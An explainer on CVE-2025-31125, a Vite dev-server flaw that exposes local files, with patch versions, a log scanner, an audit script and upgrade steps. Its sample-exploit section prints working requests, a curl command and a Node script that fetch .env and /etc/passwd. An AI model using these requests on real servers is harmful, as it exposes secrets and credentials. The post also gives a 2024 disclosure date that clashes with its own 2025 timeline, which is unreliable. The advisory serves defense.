CVE-2025-31125 - Vite Leaks Local Files via ?inline&import or ?raw?import
On June 10, 2024, a new vulnerability, CVE-2025-31125, was disclosed affecting Vite, a modern build tool for JavaScript projects. This issue allows attackers to request local files from the Vite dev server using specific URL parameters. If your Vite server is exposed to the internet (using --host or server.host settings), your project files—and possibly sensitive data—could be at risk.
Vite patched this in versions 6.2.4, 6.1.3, 6.0.13, 5.4.16, and 4.5.11. If you're on an older version, you need to upgrade immediately.
Let's break down how this vulnerability works, see real code, and learn how to keep your projects safe.
What Is the Problem? (The Vulnerability)
Usually, Vite only serves files intended for your frontend app during development. But a flaw in the dev server allows users to fetch files outside the intended set—anything readable on the local system—by adding ?inline&import or ?raw?import to a request.
This is called a "Local File Disclosure". Anyone who can access your dev server can ask for files like your environment variables, private config, or source code—even files you never meant to share.
Who Is Affected?
- Only dev servers explicitly exposed to the network (using Vite's --host CLI flag, or the server.host config) are at risk.
Let’s say you’re running a Vite server with this command:
    vite --host
Or your vite.config.js looks like this:
    export default {
      server: {
        host: '...',
        port: 5173
      }
    }
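As an added illustration (not code from the original post or from the Vite project), here is the exposing setting next to the one that keeps the dev server on loopback. `server.host` and `server.port` are documented Vite options; `host: true` means "listen on all addresses", and leaving `host` unset binds to localhost, which is Vite's default.

```javascript
// vite.config.js, added example: weak setting beside the safer one.
// Both shapes use real Vite server options (host, port); the port is arbitrary.

// Weak: every interface. Anyone who can reach the machine can reach the dev server,
// which is the precondition for CVE-2025-31125.
export const exposedConfig = {
  server: {
    host: true,      // same effect as passing --host on the CLI
    port: 5173,
  },
};

// Safer: loopback only. Equivalent to omitting `host` entirely.
export default {
  server: {
    host: '127.0.0.1',
    port: 5173,
  },
};
```

If you genuinely need other machines to reach the dev server (for example a phone on the same LAN), prefer an SSH tunnel or a firewall rule that allows only those hosts over `host: true`.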
Normally, only index.html, src/App.vue, etc., are served. But with this bug, a user could see any file like so:
    http://your-server-ip:5173/.env?inline&import
    http://your-server-ip:5173/package.json?raw?import
    http://your-server-ip:5173/../../secret.txt?inline&import
If your dev server is on a public IP, an attacker just needs your address.
Sample Exploit
Suppose you're running Vite on a remote server with (unsafe) network exposure. An attacker can request:
    GET /package.json?raw?import HTTP/1.1
    Host: your-vite-server:5173
You'd see the full text of your package.json file in the browser.
Or, to leak secrets:
    GET /.env?inline&import HTTP/1.1
    Host: your-vite-server:5173
Even worse, path traversal with ../ was possible in some cases, e.g.
    GET /../../etc/passwd?inline&import HTTP/1.1
    Host: your-vite-server:5173
Here’s a simple curl command that demonstrates this bug (before the patch):
    # Replace <your-vite-server-ip> and the file path
    curl "http://<your-vite-server-ip>:5173/.env?inline&import"
Or, in JavaScript (Node):
    const http = require('http');

    // Fetch the file through the dev server and print the response body.
    http.get('http://your-vite-server:5173/.env?inline&import', res => {
      let data = '';
      res.on('data', chunk => data += chunk);
      res.on('end', () => console.log(data));
    });
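From the defender's side, the requests above leave a recognisable trace: a query string containing `inline&import` or `raw?import` on a path that is a dotfile or walks out of the project root. The following is an added example, not code from the original post or from Vite, that scans a few constructed access-log lines for those two query shapes and rates each hit. The `METHOD TARGET STATUS` log layout is an assumption; adjust the `split()` if your reverse proxy logs differently.

```javascript
// Added example: flag dev-server requests that use the CVE-2025-31125 query strings.
// Log format "METHOD TARGET STATUS" is assumed; sample lines below are constructed.

const SAMPLE_LOG = [
  'GET /src/App.vue 200',
  'GET /package.json?raw?import 200',
  'GET /.env?inline&import 200',
  'GET /assets/logo.svg?import 200',
  'GET /../../etc/passwd?inline&import 200',
  'GET /src/style.css?inline&import 200',
];

// Returns a finding for one line, or null when the line does not carry
// either query shape named in the advisory (?inline&import or ?raw?import).
function analyzeLine(line) {
  const parts = line.trim().split(/\s+/);
  if (parts.length < 3) return null;
  const [method, target, status] = parts;
  const qIndex = target.indexOf('?');
  if (qIndex === -1) return null;
  const path = target.slice(0, qIndex);
  const query = target.slice(qIndex + 1);

  let vector = null;
  if (query.includes('inline&import')) vector = 'inline&import';
  else if (query.includes('raw?import')) vector = 'raw?import';
  if (!vector) return null;

  const segments = path.split('/');
  // A '..' segment means the request tries to leave the project root.
  const traversal = segments.includes('..');
  // Dotfiles such as .env are the usual secret-bearing targets.
  const dotfile = segments.some((s) => s.startsWith('.') && s !== '..' && s !== '.');
  // In-project source files can legitimately be requested with ?inline, so
  // those only get a 'review' rating; dotfiles and traversal are 'high'.
  const severity = traversal || dotfile ? 'high' : 'review';
  return { method, path, status, vector, traversal, dotfile, severity };
}

// Scans an array of log lines and keeps only the findings.
function findSuspicious(lines) {
  return lines.map(analyzeLine).filter((f) => f !== null);
}

// Usage: print findings for the constructed sample when run directly.
if (typeof require !== 'undefined' && require.main === module) {
  for (const f of findSuspicious(SAMPLE_LOG)) {
    console.log(`${f.severity.padEnd(6)} ${f.method} ${f.path} via ?${f.vector}`);
  }
}
```

A 200 status on a `high` finding means the file was actually served, which on an unpatched dev server is a confirmed disclosure; on a patched server the same request should be refused, so the finding is still worth knowing about but is no longer a leak.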
How to Fix
Upgrade to a patched Vite release: 6.2.4, 6.1.3, 6.0.13, 5.4.16, or 4.5.11, whichever matches the line you are on.
Never ever expose your dev server to the open internet unless you know exactly what you’re doing.
Example upgrade (if you use npm):
    npm install vite@latest
Or pick the right version:
    npm install vite@6.2.4
Double-check your vite.config.js to make sure server.host never says '...' or your IP unless you 100% must—and then put it behind authentication or a firewall.
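Both checks above (is the installed Vite at or past the fix for its line, and does `server.host` expose the dev server beyond loopback) can be scripted. The following is an added example, not part of the original post or of Vite's tooling; the patched-version list is the one given above, the semver handling is a deliberately minimal split that ignores pre-release tags, and the `auditProject` input shape is an assumption you would fill from your own package.json and vite.config.js.

```javascript
// Added example: audit a project's Vite version and server.host setting
// against CVE-2025-31125. Version list is from the advisory summary above.

const PATCHED = ['6.2.4', '6.1.3', '6.0.13', '5.4.16', '4.5.11'];

// '^6.1.2' -> [6, 1, 2]; pre-release suffixes such as '-beta.1' are dropped.
function parseVersion(v) {
  return String(v).replace(/^[\^~v]/, '').split('-')[0].split('.').map(Number);
}

function compare(a, b) {
  for (let i = 0; i < 3; i++) {
    if ((a[i] || 0) !== (b[i] || 0)) return (a[i] || 0) - (b[i] || 0);
  }
  return 0;
}

// True when `installed` carries the fix: at or above the listed fix for its
// own minor line, newer than every listed fix in its major, or a newer major.
function isPatched(installed) {
  const v = parseVersion(installed);
  const fixes = PATCHED.map(parseVersion);
  const sameMajor = fixes.filter((p) => p[0] === v[0]);
  if (sameMajor.length === 0) {
    // Majors newer than any listed fix ship with it; older majors never got one.
    return v[0] > Math.max(...fixes.map((p) => p[0]));
  }
  const exact = sameMajor.find((p) => p[1] === v[1]);
  if (exact) return compare(v, exact) >= 0;
  // No fix listed for this minor: only versions past the latest fix in the major count.
  const latest = sameMajor.reduce((a, b) => (compare(a, b) >= 0 ? a : b));
  return compare(v, latest) > 0;
}

// True when a server.host value makes Vite listen beyond loopback.
// undefined/false is Vite's default (localhost); true means all interfaces.
function hostExposesNetwork(host) {
  if (host === undefined || host === false) return false;
  if (host === true) return true;
  const h = String(host).toLowerCase();
  return !['localhost', '127.0.0.1', '::1'].includes(h);
}

// Assumed input shape: { viteVersion, serverHost }. Returns a list of findings.
function auditProject({ viteVersion, serverHost }) {
  const findings = [];
  if (!isPatched(viteVersion)) {
    findings.push(`vite ${viteVersion} is below the fix for its line; upgrade`);
  }
  if (hostExposesNetwork(serverHost)) {
    findings.push(`server.host=${JSON.stringify(serverHost)} exposes the dev server beyond loopback`);
  }
  return findings;
}

// Usage with constructed values (not a real project).
if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditProject({ viteVersion: '^6.1.2', serverHost: true }));
}
```

Run this from a pre-commit hook or CI job and fail the build when `auditProject` returns anything; an exposed host is a finding regardless of version, because the patch only closes this one file-disclosure path and does not make an open dev server safe.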
References
- CVE-2025-31125 at NIST NVD
- Vite release notes (GitHub)
- Discussion on the disclosure (GitHub issue)
- Vite Documentation
Quick Recap
- CVE-2025-31125 lets people fetch any file via the Vite dev server using ?inline&import or ?raw?import.
- Don’t run Vite dev servers on open networks.
Stay safe, and always keep your dependencies up-to-date!
Timeline
Published on: 03/31/2025 17:15:43 UTC
Last modified on: 04/01/2025 20:26:22 UTC